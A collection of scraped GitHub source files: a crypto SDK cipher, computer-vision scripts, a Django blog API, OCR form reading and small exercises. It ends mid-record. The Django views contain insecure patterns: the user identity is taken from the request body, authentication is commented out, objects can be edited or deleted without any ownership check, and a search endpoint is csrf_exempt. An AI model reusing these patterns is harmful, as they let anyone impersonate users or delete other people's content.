modes.CTR,\n constants.SymmetricMode.CBC: modes.CBC,\n constants.SymmetricMode.GCM: modes.GCM,\n constants.SymmetricMode.CFB: modes.CFB,\n }[self.mode]\n\n except KeyError:\n raise ValueError(f\"Unsupported mode: {self.mode}\")\n\n\nclass SM4SymmetricCipher(base.BaseSymmetricCipher):\n\n CIPHER_TYPE: str = constants.SymmetricCipherType.SM4.value\n\n CONFIG_DATA_CLASS: typing.Type[SM4SymmetricRuntimeConfig] = SM4SymmetricRuntimeConfig\n\n OPTIONS_DATA_CLASS: typing.Type[SM4SymmetricOptions] = SM4SymmetricOptions\n\n config: SM4SymmetricRuntimeConfig = None\n\n def __init__(\n self,\n key: typing.Optional[typing.Union[bytes, str]] = None,\n **options,\n ):\n super().__init__(key, **options)\n if self.config.key and len(self.config.key) < self.config.key_size:\n self.config.key += b\"\\x00\" * (self.config.key_size - len(self.config.key))\n\n def get_block_size(self) -> int:\n return algorithms.SM4.block_size // 8\n\n def _encrypt(self, plaintext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.encryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n ciphertext_bytes: bytes = cipher_ctx.update(plaintext_bytes)\n ciphertext_bytes += cipher_ctx.finalize()\n\n if self.config.mode == constants.SymmetricMode.GCM:\n encryption_metadata.tag = cipher_ctx.tag\n return ciphertext_bytes\n\n def _decrypt(self, ciphertext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n if encryption_metadata.tag:\n mode_init_args.append(encryption_metadata.tag)\n\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.decryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n plaintext_bytes = cipher_ctx.update(ciphertext_bytes)\n plaintext_bytes += cipher_ctx.finalize()\n return plaintext_bytes\n","repo_name":"TencentBlueKing/crypto-python-sdk","sub_path":"bkcrypto/symmetric/ciphers/sm4.py","file_name":"sm4.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"5187168032","text":"from PIL import Image\n\nimport torch\nimport torchvision.transforms.functional as TF\nimport visualpriors\nimport subprocess\nimport cv2\nimport numpy as np\n\nmode = ['autoencoding', 'depth_euclidean']# 'reshading', 'keypoints2d', 'edge_occlusion','curvature', 'edge_texture', 'keypoints3d', 'segment_unsup2d', 'segment_unsup25d','normal','segment_semantic', 'denoising' , 'inpainting',\n # 'class_object',\n # 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point']\ntool = 'cv'\n#not impletemented: 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point'\n# mismatch: 'class_object'\n# \n#'colorization',\n#\n#\n# \n# Download a test image\n# subprocess.call(\"curl -O https://raw.githubusercontent.com/StanfordVL/taskonomy/master/taskbank/assets/test.png\", shell=True)\n\n# Load image and rescale/resize to [-1,1] and 3x256x256\nif tool=='pil':\n image = Image.open('./test/test.png')\n print(type(image))\n x = TF.to_tensor(TF.resize(image, 256)) * 2 - 1\n print(x.dtype)\n print(type(x))\nelse:\n image=cv2.imread('./test/test.png')\n x=torch.from_numpy(image)\n print(x.dtype)\n x = TF.to_tensor(image) * 2 - 1\n # x = x.permute(2,0,1).float()* 2 - 1\n print(x.dtype)\nx = x.unsqueeze_(0)\n\nfor i, m in enumerate(mode):\n\n try:\n representation = visualpriors.representation_transform(x, m, device='cpu')\n print(representation.shape)# torch.Size([1, 8, 16, 16])\n except:\n print(m)\n\n # Transform to normals feature and then visualize the readout\n pred = visualpriors.feature_readout(x, m, device='cpu')\n\n # Save it\n TF.to_pil_image(pred[0] / 2. + 0.5).save('test_{}_readout.png'.format(m))","repo_name":"GELIELEO/attention_on_midlevel","sub_path":"tests/visualpriors_test.py","file_name":"visualpriors_test.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30383956959","text":"import cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Load Yolo\r\nnet = cv2.dnn.readNet(\"/home/kasztp/git/yolov3/yolov3.weights\", \"/home/kasztp/git/yolov3/yolov3.cfg\")\r\nclasses = []\r\nwith open(\"/home/kasztp/git/yolov3/coco.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\nfont = cv2.FONT_HERSHEY_PLAIN\r\n\r\nwhile(True):\r\n # Capture frame-by-frame\r\n ret, frame = cap.read()\r\n\r\n height,width,channels = frame.shape\r\n # Detecting objects\r\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n net.setInput(blob)\r\n outs = net.forward(output_layers)\r\n\r\n #Showing info on screen/ get confidence score of algorithm in detecting an object in blob\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n confidence = scores[class_id]\r\n if confidence > 0.5:\r\n #object detected\r\n center_x= int(detection[0]*width)\r\n center_y= int(detection[1]*height)\r\n w = int(detection[2]*width)\r\n h = int(detection[3]*height)\r\n\r\n #rectangle co-ordinaters\r\n x=int(center_x - w/2)\r\n y=int(center_y - h/2)\r\n\r\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),1)\r\n cv2.putText(frame,classes[class_id],(x,y),font,1,(255,255,255),1) \r\n\r\n # Display the resulting frame\r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# When everything done, release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kasztp/yolo-test","sub_path":"yolo1.py","file_name":"yolo1.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21910752856","text":"#MINHA FORMULA\n\nimport math\n\na=float(input(\"\\nDigite o valor de A:\\n\\n\"))\nb=float(input(\"\\nDigite o valor de B:\\n\\n\"))\nc=float(input(\"\\nDigite o valor de C:\\n\\n\"))\n\nwhile a==0:\n a=float(input(\"O valor de 'a' não pode ser ZERO, por favor digite outro valor:\\n\\n\"))\n\nelse:\n delta=b**2-4*a*c\n print(\"\\n\\nDelta é:\",delta,\"\\n\\n\")\n\n if delta<0:\n print(\"Não tem raiz real.\\n\\n\")\n\n elif delta==0:\n raiz1=(-b+math.sqrt(delta))/(2*a)\n print(\"Tem 1 raiz real.\\n\\n\")\n print(\"A raiz real é:\",raiz1,\"\\n\\n\")\n\n elif delta>0:\n raiz1=(-b+math.sqrt(delta))/(2*a)\n raiz2=(-b-math.sqrt(delta))/(2*a)\n print(\"Tem 2 raizes reais.\\n\\n\")\n print(\"As raizes reais são:\",raiz1,\"\\n\\n\")\n print(\"As raizes reais são:\",raiz2,\"\\n\\n\")\n\n#FORMULA PROFESSOR\n\ndeltaprof = b ** 2 - 4 * a * c\n\nif deltaprof == 0:\n raiz1 =(-b + math.sqrt(deltaprof)) / (2 * a)\n print(\"EQUACAO PROF: A única raiz é: \", raiz1,\"\\n\\n\")\nelse:\n if deltaprof < 0:\n print(\"EQUACAO PROF: A equação não possui raízes reais\\n\\n\")\n else:\n raiz1 = (-b + math.sqrt(deltaprof)) / (2 * a)\n raiz2 = (-b - math.sqrt(deltaprof)) / (2 * a)\n print(\"EQUACAO PROF: A primeira raiz é: \",raiz1,\"\\n\\n\")\n print(\"EQUACAO PROF: A segunda raiz é: \",raiz2,\"\\n\\n\")\n\n","repo_name":"cgsmendes/aulas","sub_path":"if-else-formulabascara.py","file_name":"if-else-formulabascara.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9067396311","text":"\"\"\"Json serialization utilities.\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport datetime\nimport decimal\nimport uuid\n\nfrom six import text_type\n\nfrom celery.utils.imports import symbol_by_name\n\ntry:\n from django.utils.functional import Promise as DjangoPromise\nexcept ImportError: # pragma: no cover\n class DjangoPromise(object): # noqa\n pass\n\n__all__ = ['JsonEncoder', 'dumps']\n\n_JSON_EXTRA_ARGS = {\n 'simplejson': {'use_decimal': False},\n}\n\n\ndef get_best_json(attr=None,\n choices=['simplejson', 'json']):\n for i, module in enumerate(choices):\n try:\n sym = ':'.join([module, attr]) if attr else module\n return symbol_by_name(sym), _JSON_EXTRA_ARGS.get(module, {})\n except (AttributeError, ImportError):\n if i + 1 >= len(choices):\n raise\n\n\njson, _json_args = get_best_json()\n\n\nclass JsonEncoder(get_best_json('JSONEncoder')[0]):\n \"\"\"Thorn custom Json encoder.\n\n Notes:\n Same as django.core.serializers.json.JSONEncoder but preserves\n datetime microsecond information.\n \"\"\"\n\n def default(self, o,\n dates=(datetime.datetime, datetime.date),\n times=(datetime.time,),\n textual=(decimal.Decimal, uuid.UUID, DjangoPromise),\n isinstance=isinstance,\n datetime=datetime.datetime,\n text_type=text_type):\n if isinstance(o, dates):\n if not isinstance(o, datetime):\n o = datetime(o.year, o.month, o.day, 0, 0, 0, 0)\n r = o.isoformat()\n if r.endswith(\"+00:00\"):\n r = r[:-6] + \"Z\"\n return r\n elif isinstance(o, times):\n return o.isoformat()\n elif isinstance(o, textual):\n return text_type(o)\n else:\n return super(JsonEncoder, self).default(o)\n\n\ndef dumps(obj, encode=json.dumps, cls=JsonEncoder):\n \"\"\"Serialize object as json string.\"\"\"\n return encode(obj, cls=cls, **_json_args)\n","repo_name":"robinhood/thorn","sub_path":"thorn/utils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"35"} +{"seq_id":"2668443141","text":"\"\"\"Split all files into small parts.\n\"\"\"\nimport gzip\nimport shutil\nimport tempfile\nimport argparse\nimport subprocess\nfrom pathlib import Path\nfrom datetime import datetime as dt\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\"-s\", \"--smiles\", nargs='+', required=True)\nparser.add_argument(\"-l\", \"--length\", default=1000000, type=int, help=\"number of lines in each part, default 1,000,000\")\nparser.add_argument(\"-o\", \"--output_dir\", required=True)\nargs = parser.parse_args()\n\n\ndef page_generator_from_files(smiles_files, length):\n page = []\n count = 0\n for smi in smiles_files:\n print(\"{}: loading {}\".format(dt.now(), smi))\n smi = Path(smi)\n if smi.suffix == '.gz':\n f = gzip.open(smi, 'rt')\n else:\n f = open(smi, 'r')\n for i in f:\n if count < length:\n page.append(i)\n count += 1\n else:\n yield page\n page = []\n count = 0\n if page:\n yield page\n\nstart = dt.now()\n\noutput = Path(args.output_dir)\nfile_count = 0\nfor page in page_generator_from_files(args.smiles, args.length):\n file_count += 1\n # save under dirs separately for job submitting.\n file_dir = output / 'd.{:04d}'.format(file_count)\n file_dir.mkdir(parents=True, exist_ok=True)\n file_path = file_dir / \"{}.{:04d}.smi\".format(output.stem, file_count)\n with open(file_path, 'w') as f:\n f.writelines(page)\n print(\"{}: saved {}\".format(dt.now(), file_path))\nprint(\"Total elapsed time: {}\".format(dt.now()-start))\n","repo_name":"hnlab/can-ai-do","sub_path":"dude/zinc_rdkit_psql/split_into_parts.py","file_name":"split_into_parts.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"28602213966","text":"from posts.models import (\n Post,\n Category,\n BlogLike,\n BlogComment,\n CommentLike,\n Author\n\n)\nfrom .serializers import (\n PostSerializer,\n CategorySerializer,\n LikeGetSerializer,\n LikeSerializer,\n BlogComment,\n CommentGetSerializer,\n CommentPostSerializer,\n CommentPutSerializer,\n AuthorSerializer,\n PostCreateSerializer\n\n\n)\nfrom django.db.models import Count\nfrom .services.comment_view import create_comment\nfrom .services.like_view import press_like_to_product\nfrom rest_framework.views import APIView\nfrom django.views.decorators.http import require_GET\nfrom django.db.models import Q\nfrom ipware import get_client_ip\nfrom django.db import IntegrityError\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, pagination, viewsets\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass AuthorPostsAPIView(generics.ListAPIView):\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author=Author.objects.get(user=user_id)\n return Post.objects.filter(author=author)\n\nclass AuthorPostsListCreateAPIView(generics.ListCreateAPIView):\n serializer_class = PostCreateSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n return Post.objects.filter(author=author)\n\n def perform_create(self, serializer):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n # serializer.save(author=author)\n post = serializer.save(author=author)\n categories = self.request.data.get('categories', [])\n post.categories.set(categories)\n\nclass PostUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated] \n\nclass PostList(generics.ListCreateAPIView):\n # queryset=Post.objects.all()\n serializer_class = PostSerializer\n\n def get_queryset(self):\n category = self.request.query_params.get('category', None)\n title = self.request.query_params.get('title', None)\n if category:\n queryset = Post.objects.filter(categories=category)\n elif title:\n queryset = Post.objects.filter(title__icontains=title)\n else:\n queryset = Post.objects.all()\n return queryset\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n # permission_classes=[IsAuthenticated]\n serializer_class = PostSerializer\n lookup_field = 'pk'\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.increase_views()\n \"\"\"\n when deply it in a host you can increse by evey ip\n \"\"\"\n # Get the user's IP address\n # ip_address, _ = get_client_ip(request)\n\n # if ip_address: # If IP is detected\n # instance.increment_views(ip_address) # Call the increment_views method\n\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass CategoryList(generics.ListCreateAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n\n# popular post\n\nclass MostViewedPostsAPIView(generics.ListAPIView):\n queryset = Post.objects.filter(status=True).order_by(\n '-views')[:8] # Query for popular posts\n serializer_class = PostSerializer\n\n\nclass MostLikedPostsAPIView(generics.ListAPIView):\n queryset = Post.objects.filter(status=True).annotate(\n like_count=Count('bloglike')).order_by('-like_count')[:8]\n serializer_class = PostSerializer\n# Blog tags list\n\n\nclass TagBlogList(generics.ListCreateAPIView):\n serializer_class = PostSerializer\n\n def get_queryset(self):\n tag = self.kwargs['tag']\n queryset = Post.objects.filter(tags__icontains=tag)\n return queryset\n\n\nclass LikeView(APIView):\n # permission_classes = [IsAuthenticated]\n\n def get(self, request, *args, **kwargs):\n if kwargs:\n queryset = BlogLike.objects.filter(\n blog_item__pk=kwargs[\"blog_item_pk\"])\n serializer = LikeGetSerializer(queryset, many=True)\n else:\n queryset = BlogLike.objects.all()\n serializer = LikeGetSerializer(queryset, many=True)\n\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n\n user = User.objects.get(pk=int(request.data[\"user_id\"]))\n post = Post.objects.get(pk=int(request.data[\"blog_item\"]))\n like = BlogLike.objects.filter(user=user, blog_item=post)\n if like:\n like.like_status = \"false\"\n like.delete()\n msg = False\n else:\n BlogLike.objects.create(\n user=user, blog_item=post, like_status=True)\n msg = True\n return Response({\"msg\": msg})\n\n\n@csrf_exempt\n@require_GET\ndef search_blogs(request):\n search_query = request.GET.get('q', '')\n\n # Perform the search query on the Blog model\n search_results = Post.objects.filter(\n Q(title__icontains=search_query) | Q(body__icontains=search_query)\n )\n\n # Serialize the search results\n serialized_results = [{'title': blog.title, 'body': blog.body}\n for blog in search_results]\n\n return JsonResponse(serialized_results, safe=False)\n\n# =========== comments views\n\n\nclass CommentBlogView(APIView):\n # permission_classes = [IsAuthenticated]\n\n def get(self, request, *args, **kwargs):\n\n if kwargs:\n queryset = BlogComment.objects.filter(\n blog_item__pk=kwargs[\"blog_item\"], parent=None\n )\n serializer = CommentGetSerializer(\n queryset, many=True, context={'request': request})\n else:\n queryset = BlogComment.objects.all()\n serializer = CommentGetSerializer(\n queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n serializer = CommentPostSerializer(data=request.data)\n user = User.objects.get(pk=int(request.data[\"user_id\"]))\n\n if serializer.is_valid():\n comment = create_comment(**serializer.data, user=user)\n return Response(\n CommentGetSerializer(instance=comment, context={\n 'request': request}).data,\n status=status.HTTP_201_CREATED,\n )\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def put(self, request, pk):\n post = BlogComment.objects.get(pk=pk)\n data = {**request.data, \"user\": request.user.id}\n serializer = CommentPutSerializer(instance=post, data=data)\n if serializer.is_valid():\n instance = serializer.save()\n newSerializer = CommentGetSerializer(\n instance=instance, context={'request': request})\n return Response(newSerializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n post = BlogComment.objects.get(pk=pk)\n post.delete()\n return Response({\"message\": \"Item was successfully deleted\"})\n# class CommentBlogView(APIView):\n# # permission_classes = [IsAuthenticated]\n\n# def get(self, request, *args, **kwargs):\n\n# if kwargs:\n# queryset = BlogComment.objects.filter(\n# blog_item__pk=kwargs[\"blog_item\"], parent=None\n# )\n# serializer = CommentGetSerializer(queryset, many=True)\n# else:\n# queryset = BlogComment.objects.all()\n# serializer = CommentGetSerializer(queryset, many=True)\n# return Response(serializer.data)\n\n# def post(self, request, *args, **kwargs):\n# serializer = CommentPostSerializer(data=request.data)\n# user=User.objects.get(pk=int(request.data[\"user_id\"]))\n\n# if serializer.is_valid():\n# comment = create_comment(**serializer.data, user=user)\n# return Response(\n# CommentGetSerializer(instance=comment).data,\n# status=status.HTTP_201_CREATED,\n# )\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n# def put(self, request, pk):\n# post = BlogComment.objects.get(pk=pk)\n# data = {**request.data, \"user\": request.user.id}\n# serializer = CommentPutSerializer(instance=post, data=data)\n# if serializer.is_valid():\n# instance = serializer.save()\n# newSerializer = CommentGetSerializer(instance=instance)\n# return Response(newSerializer.data, status=status.HTTP_200_OK)\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n# def delete(self, requset, pk):\n# post = BlogComment.objects.get(pk=pk)\n# post.delete()\n# return Response({\"message\": \"Item was succesfully deleted\"})\n\n\n# class CommentLikeView(APIView):\n# permission_classes = [IsAuthenticated]\n\n# def get(self, request, *args, **kwargs):\n# if kwargs:\n# queryset = CommentLike.objects.filter(\n# comment_blog_item__blog_item__pk=kwargs[\"comment_blog_item_pk\"]\n# )\n# serializer = CommentLikeGetSerializer(queryset, many=True)\n# else:\n# queryset = CommentLike.objects.all()\n# serializer = CommentLikeGetSerializer(queryset, many=True)\n\n# return Response(serializer.data)\n\n# def post(self, request, *args, **kwargs):\n# serializer = CommentLikePostSerializer(data=request.data)\n# if serializer.is_valid():\n# like_id = press_like_to_comment(request, request.data[\"comment_blog_item\"])\n# return Response(\n# {**serializer.data, \"like_id\": like_id}, status=status.HTTP_201_CREATED\n# )\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def check_comment_like_exists(request, comment_id):\n# user = request.user\n# try:\n# CommentLike.objects.get(user=user, comment_blog_item__id=comment_id)\n# return Response({\"result\": True})\n# except Exception as e:\n# return Response({\"result\": False})\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def get_blogs_for_user(request):\n# user = request.user\n# queryset = user.blogitem_set.all()\n\n# serializer = BlogSerializer(queryset, many=True)\n# return Response(serializer.data)\n","repo_name":"abbasalirezaei/Django-React-Bolg-App-","sub_path":"backend/posts/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12944767569","text":"import numpy as ny \nimport cv2\n\nimg = cv2.imread(\"castle.jpg\",1)\ncv2.imwrite('castle-mean-formula.jpg',img)\ncv2.imwrite('castle-luminosity-formula.jpg',img)\ngray1 = cv2.imread('castle-gray1.jpg',1)\ngray2 = cv2.imread('castle-gray2.jpg',1)\nrow,col,color = gray1.shape\n\n#first method - using mean formula\nfor i in range(0,row):\n for j in range(0,col):\n b,g,r = gray1[i,j]\n gray=(int(r)+int(g)+int(b))/3\n gray1[i,j]=gray\ncv2.imshow('castle - grayscale - mean formula',gray1)\ncv2.imwrite('castle-mean-formula.jpg',gray1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#second method - using luminosity formula\nfor i in range(0, row):\n for j in range(0, col):\n b,g,r=gray2[i,j]\n gray=(int(b)*0.07 + int(g)*0.72 + int(r)*0.21)\n gray2[i,j]=gray\ncv2.imwrite('castle-luminosity-formula.jpg',gray2)\ncv2.imshow('castle - grayscale - luminosity formula',gray2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"rohit-mp/ImgProc-OpenCV","sub_path":"ColorToGray/color-to-grayscale.py","file_name":"color-to-grayscale.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21056384677","text":"#!/usr/bin/python3\nimport unittest\nimport pep8\nfrom models.square import Square\n\n\nclass testcase(unittest.TestCase):\n \"\"\"this is the class for unittest\"\"\"\n\n def test_pep8(self):\n \"\"\"pep8 test\"\"\"\n style = pep8.StyleGuide()\n res = style.check_files([\"models/square.py\"])\n self.assertEqual(res.total_errors, 0, \"pep8 error\")\n\n def test_area(self):\n \"\"\"check area\"\"\"\n s1 = Square(5)\n self.assertEqual(s1.area(), 25)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"rania3103/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41915623840","text":"import json\n\nfrom fastapi import APIRouter, HTTPException, Path\nfrom pydantic import HttpUrl\n\nfrom src.api import schemas\nfrom src.utils.scrapers import newsletter_scraper\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=list[schemas.newsletter.NewsletterInfo])\ndef get_all_newsletters():\n \"\"\"\n 取得所有的電子報。\n \"\"\"\n return newsletter_scraper.get_all_newsletters_list()\n\n\n@router.get(\n \"/{newsletter_name}\", response_model=list[schemas.newsletter.NewsletterData]\n)\ndef get_newsletter_by_name(\n newsletter_name: schemas.newsletter.NewsletterName = Path(\n ..., example=\"國立清華大學學生會電子報\", description=\"抓取的電子報名稱\"\n )\n):\n \"\"\"\n 透過電子報名稱取得指定的電子報列表。\n \"\"\"\n with open(\"data/newsletter_list.json\", \"r\", encoding=\"utf-8\") as f:\n data = f.read()\n data = json.loads(data)\n newsletter_link = None\n for newsletter in data:\n if newsletter[\"name\"] == newsletter_name:\n newsletter_link = newsletter[\"link\"]\n break\n if newsletter_link is None:\n raise HTTPException(status_code=404, detail=\"Newsletter not found\")\n return newsletter_scraper.get_selected_newsletter_list(newsletter_link)\n\n\n@router.get(\n \"/paths/{newsletter_link:path}\",\n response_model=list[schemas.newsletter.NewsletterData],\n)\ndef get_newsletter_by_link(\n newsletter_link: HttpUrl = Path(\n ...,\n example=\"https://newsletter.cc.nthu.edu.tw/nthu-list/index.php/zh/home-zh-tw/listid-44-\",\n description=\"抓取的電子報網址\",\n )\n):\n \"\"\"\n 透過電子報網址取得指定的電子報列表。\n \"\"\"\n return newsletter_scraper.get_selected_newsletter_list(str(newsletter_link))\n","repo_name":"NTHU-SA/NTHU-Data-API","sub_path":"src/api/routers/newsletters.py","file_name":"newsletters.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"33404162558","text":"import cv2\nimport numpy as np\nimport pytesseract\nimport os\n\nMAX_FEATURES = 500\nGOOD_MATCH_PERCENT = 0.15\n\nclass dataReader:\n\n\n def __init__(self, pointsOfInterest, query):\n self.pointsOfInterest = pointsOfInterest\n self.query = query\n self.per = 90\n\n def alignImages(self, im1, im2):\n\n # Convert images to grayscale\n im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n\n # Detect ORB features and compute descriptors.\n orb = cv2.ORB_create(MAX_FEATURES)\n keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n\n # Match features.\n matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n matches = matcher.match(descriptors1, descriptors2, None)\n\n # Sort matches by score\n matches.sort(key=lambda x: x.distance, reverse=False)\n\n # Remove not so good matches\n numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\n matches = matches[:numGoodMatches]\n\n # Draw top matches\n imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\n h, w, c = im1.shape\n cv2.imshow(\"matches\", cv2.resize(imMatches,(w//2,h//2)))\n\n # Extract location of good matches\n points1 = np.zeros((len(matches), 2), dtype=np.float32)\n points2 = np.zeros((len(matches), 2), dtype=np.float32)\n\n for i, match in enumerate(matches):\n points1[i, :] = keypoints1[match.queryIdx].pt\n points2[i, :] = keypoints2[match.trainIdx].pt\n\n # Find homography\n h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\n\n # Use homography\n height, width, channels = im2.shape\n\n\n im1Reg = cv2.warpPerspective(im1, h, (width, height))\n cv2.imwrite(\"matches.jpg\", im1Reg)\n\n return im1Reg, h\n\n def readData(self, image):\n # load query\n # ----\n\n img1 = cv2.imread(self.query)\n\n filestr = image.read()\n #convert string data to numpy array\n npimg = np.fromstring(filestr, np.uint8)\n # convert numpy array to image\n img2 = cv2.imdecode(npimg, cv2.IMREAD_COLOR)\n\n imgScan, asx = self.alignImages(img2, img1)\n\n imgShow = imgScan.copy()\n\n imgMask = np.zeros_like(imgShow)\n subdata = {}\n\n # points of interest\n for x,r in enumerate(self.pointsOfInterest):\n cv2.rectangle(imgMask,(r[0][0],r[0][1]),(r[1][0],r[1][1]),(0,255,0),cv2.FILLED)\n imgShow = cv2.addWeighted(imgShow, 0.99, imgMask, 0.1,0)\n imgCrop = imgScan[r[0][1]:r[1][1], r[0][0]:r[1][0]]\n\n text = pytesseract.image_to_string(imgCrop, 'ces').strip()\n text = str(text)\n\n if text:\n if r[2] == 'array':\n try:\n subdata[r[3]].append(text)\n except:\n subdata[r[3]] = []\n subdata[r[3]].append(text)\n else:\n subdata[r[3]] = text\n\n return subdata\n","repo_name":"ondrakubicek/formReader","sub_path":"src/dataReader/dataReader.py","file_name":"dataReader.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20256308707","text":"import tensorflow as tf\n\nclass MidLevelFeatNet(tf.keras.layers.Layer):\n \"\"\"\n This class represents the Mid-Level Features Network which extracts local mid-level features\n from the low-level features and passes them to the Fusion Layer.\n \"\"\"\n\n def __init__(self, **kwargs): \n super(MidLevelFeatNet, self).__init__(**kwargs)\n self.net_layers = []\n self.net_layers.append(tf.keras.layers.Conv2D(filters=512, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n self.net_layers.append(tf.keras.layers.Conv2D(filters=256, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n\n @tf.function\n def call(self, x, training=False):\n for layer in self.net_layers:\n x = layer(x, training=training)\n return x\n\n def get_config(self):\n config = super(MidLevelFeatNet, self).get_config()\n return config\n \n @classmethod\n def from_config(cls, config):\n return cls(**config)","repo_name":"stmeinert/Recolorization_IANN","sub_path":"src/iizuka/mid_level_features_network.py","file_name":"mid_level_features_network.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22314699399","text":"\"\"\"\nFunctions to compute features for ligand and protein 